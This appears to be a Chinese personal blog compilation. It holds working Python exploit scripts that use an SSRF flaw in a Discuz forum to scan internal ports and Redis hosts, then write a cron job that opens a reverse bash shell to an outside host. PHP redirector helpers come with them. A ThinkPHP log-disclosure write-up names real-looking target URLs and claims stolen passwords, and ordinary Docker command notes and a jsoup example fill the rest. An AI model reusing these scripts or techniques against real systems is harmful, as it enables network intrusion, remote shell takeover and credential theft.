扫描本机开放的端口:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threading
import Queue
import time

threads_count = 2
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
    que.put(str(i))
def run():
    while que.qsize() > 0:
        p = que.get()
        print p + "       \r",
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
                port=p)
            r = requests.get(url,timeout=2.8)
        except:
            lock.acquire()
            print "{port}  Open".format(port=p)
            lock.release()
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()

while que.qsize() > 0:
    time.sleep(1.0)

扫描内网开放6379端口的主机:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-21 14:38:04
import requests
import threading
import Queue
import time
threads_count = 20
que = Queue.Queue()
lock = threading.Lock()
threads = []
ip = "10.171."
for i in range(1,255):
    for j in range(1,255):
        que.put(ip + str(i) + '.'+str(j))
# for i in range(0,255):
#     que.put(ip + str(i))
def run():
    while que.qsize() > 0:
        ip = que.get()
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="65321")
            r = requests.get(url,timeout=5)
            
            try:
                url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="6379")
                r = requests.get(url,timeout=5)
                lock.acquire()
                print ip
                lock.release()
            except :
                lock.acquire()
                print "{ip}  6379 Open".format(ip=ip)
                lock.release()
        except:
            pass

for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()
while que.qsize() > 0:
    time.sleep(1.0)

通过ssrf操作内网redis写任务计划反弹shell:

#!/usr/bin/env python
# coding=utf-8
# email: ringzero@0x557.org

import requests

host = '10.171.26.22'
port = '6379'
bhost = 'phpinfo.me'
bport = '32'

vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'

_location = 'http://tools.phpinfo.me/ssrf.php'

shell_location = 'http://tools.phpinfo.me/shell.php'


#1 flush db

_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#2 set crontab command

_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(

    host = host,

    port = port,

    bhost = bhost,

    bport = bport)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#3 config set dir /var/spool/cron/

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#4 config set dbfilename root

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#5 save to file

_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)

ssrf.php:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

 

shell.php:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>

从hub.docker.com 获取镜像:

docker pull nginx:1.11.1  冒号后面是版本号,默认是latest

上传自己的镜像

docker login 默认登录hub.docker.com

docker push 镜像名

上传自己的镜像到私有仓库

docker tag nginx:1.11.1 phpinfo.me:5000/lcy/nginx:1.11.1

daocker push phpinfo.me:5000/lcy/nginx:1.11.1

创建容器

docker run -d -p 5000:5000 --restart always --name registry -v /data/registry:/var/lib/registry registry:2

-d后台运行

-p  5000:5000 映射宿主的0.0.0.0:5000 -> 容器5000端口

--restart always  容器出错自动重启

--name registry 定义一个字符串(名字)

-v /data/registry:/var/lib/registry 映射宿主机的/data/registry 到容器的/var/lib/registry

-t -i /bin/bash  -t 运行容器里的程序,-i 以交互模式运行

-m 128m 指定容器运行内存为128m

 

保存容器状态,把容器保存为镜像:

docker commit -m "Added json gem" -a "Docker Newbee" 0b2616b0e5a8 lcys/nginx:1.11.1

-m 指定提交的说明信息,和git那个一样

-a 指定更新的用户信息

之后是用来创建镜像的容器的 ID

最后指定目标镜像的仓库名和 tag 信息

容器的操作:

ps 查看正在运行的容器, -a查看所有 ,-l查看历史运行(last)

run/create 启动和创建

第二个参数可以是容器的id或者names

start 对应stop的启动

stop/kali  stop停止容器,kali杀死容器

restart 重启容器

pause 暂停容器

unpause 恢复容器

logs 查看容器日志信息

stats 查看容器监控资源信息(cpu 内存 网络流量等)

top 查看容器进程信息

port 查看容器和宿主机映射端口信息

exec -it 登录容器id或名称 bash 登录容器操作(exec里面执行exit不会终止容器,而run -it里面exit会终止容器)

inspect 查看容器/镜像的详细信息

update 更新容器信息 -m 256m 更新内存为256m

cp 把容器文件copy到宿主机,或者把宿主机的文件copy到容器

docker cp 容器id或者name:/home/wwwroot/1.php /home/Lcy/ 把容器的1.php拷贝到宿主机家目录

docker cp  config.php 容器id或者name:/home/wwwroot/  把宿主机的config.php拷贝到容器

export 把容器保存为tar文件

import 把tar文件保存到镜像列表

rm  删除容器 -f强制删除

rmi  删除镜像

save 把镜像保存为tar文件

load  把镜像tar导入到镜像列表

 

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关的,所以影响应该很大吧

我们来看一下ThinkPHP3.2版本生成日志结构:

123

THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log

THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log

可以看到是 :项目名\Runtime\Logs\Home\年份_月份_日期.log

这样的话日志很容易被猜解到,而且日志里面有执行SQL语句的记录,这里我随便找几个tp站测试一下:

http://demo.xxxxx.cc/Runtime/Logs/User/16_09_06.log 成功下载,并且找到一个用户的密码

 

log

成功登录:

233333

我们再找一个案例:http://www.xxxxxx.com/Runtime/Logs/Home/16_09_06.log

 

1234

成功登录:

onethink官网测试

http://www.onethink.cn/Runtime/Logs/16_09_07.log

 

修复办法:

删除Runtime/Logs下的所有文件,并将APP_DEBUG设置为false

jsoup 是一款Java 的HTML解析器,可直接解析某个URL地址、HTML文本内容。它提供了一套非常省力的API,可通过DOM,CSS以及类似于jQuery的操作方法来取出和操作数据。

package lcy;



import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;


public class Lcy {
	public static void main(String[] args) {
		String html = "<a href=\"http://phpinfo.me\">Lcy博客</a>";
		Document doc = Jsoup.parse(html);
		Elements link = doc.getElementsByTag("a");
		Element a = link.get(0);
		System.out.println(a.attr("href"));
	}
}

123

 

使用文档:http://www.open-open.com/jsoup/